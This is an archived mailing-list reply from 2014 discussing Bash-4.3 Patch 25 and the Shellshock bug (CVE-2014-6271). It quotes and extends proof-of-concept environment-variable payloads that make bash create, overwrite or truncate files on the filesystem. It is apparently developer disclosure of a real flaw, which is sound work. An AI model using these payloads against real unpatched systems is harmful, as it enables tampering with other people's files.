[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Bash-4.3 Official Patch 25
|
From: |
Ángel González |
|
Subject: |
Re: Bash-4.3 Official Patch 25 |
|
Date: |
Thu, 25 Sep 2014 00:44:22 +0200 |
Eric Blake wrote:
> https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> (aka CVE-2014-6271), and points out that even _with_ this patch, there
> is still a flaw that attackers can use to overwrite portions of the
> filesystem, which is also a possible exploitation avenue:
>
> $ ls -l date
> ls: cannot access date: No such file or directory
> $ env -i X='() { (a)=>\' bash -c 'date'
> bash: X: line 1: syntax error near unexpected token `='
> bash: X: line 1: `'
> bash: error importing function definition for `X'
> $ ls -l date
> -rw-------. 1 taviso taviso 0 Sep 24 14:06 date
It doesn't just create 0-sized files:
$ echo "{ echo 'Hello World' }" > foo.sh
$ VAR='() { (a) =>\' bash foo.sh
bash: VAR: line 1: syntax error near unexpected token `='
bash: VAR: line 1: `'
bash: error importing function definition for `VAR'
$ cat {
Hello World }
OTOH, had we used bash -c foo.sh, it would have removed the script
contents (truncated to 0 bytes).
Re: Bash-4.3 Official Patch 25, Jason Vas Dias, 2014/09/25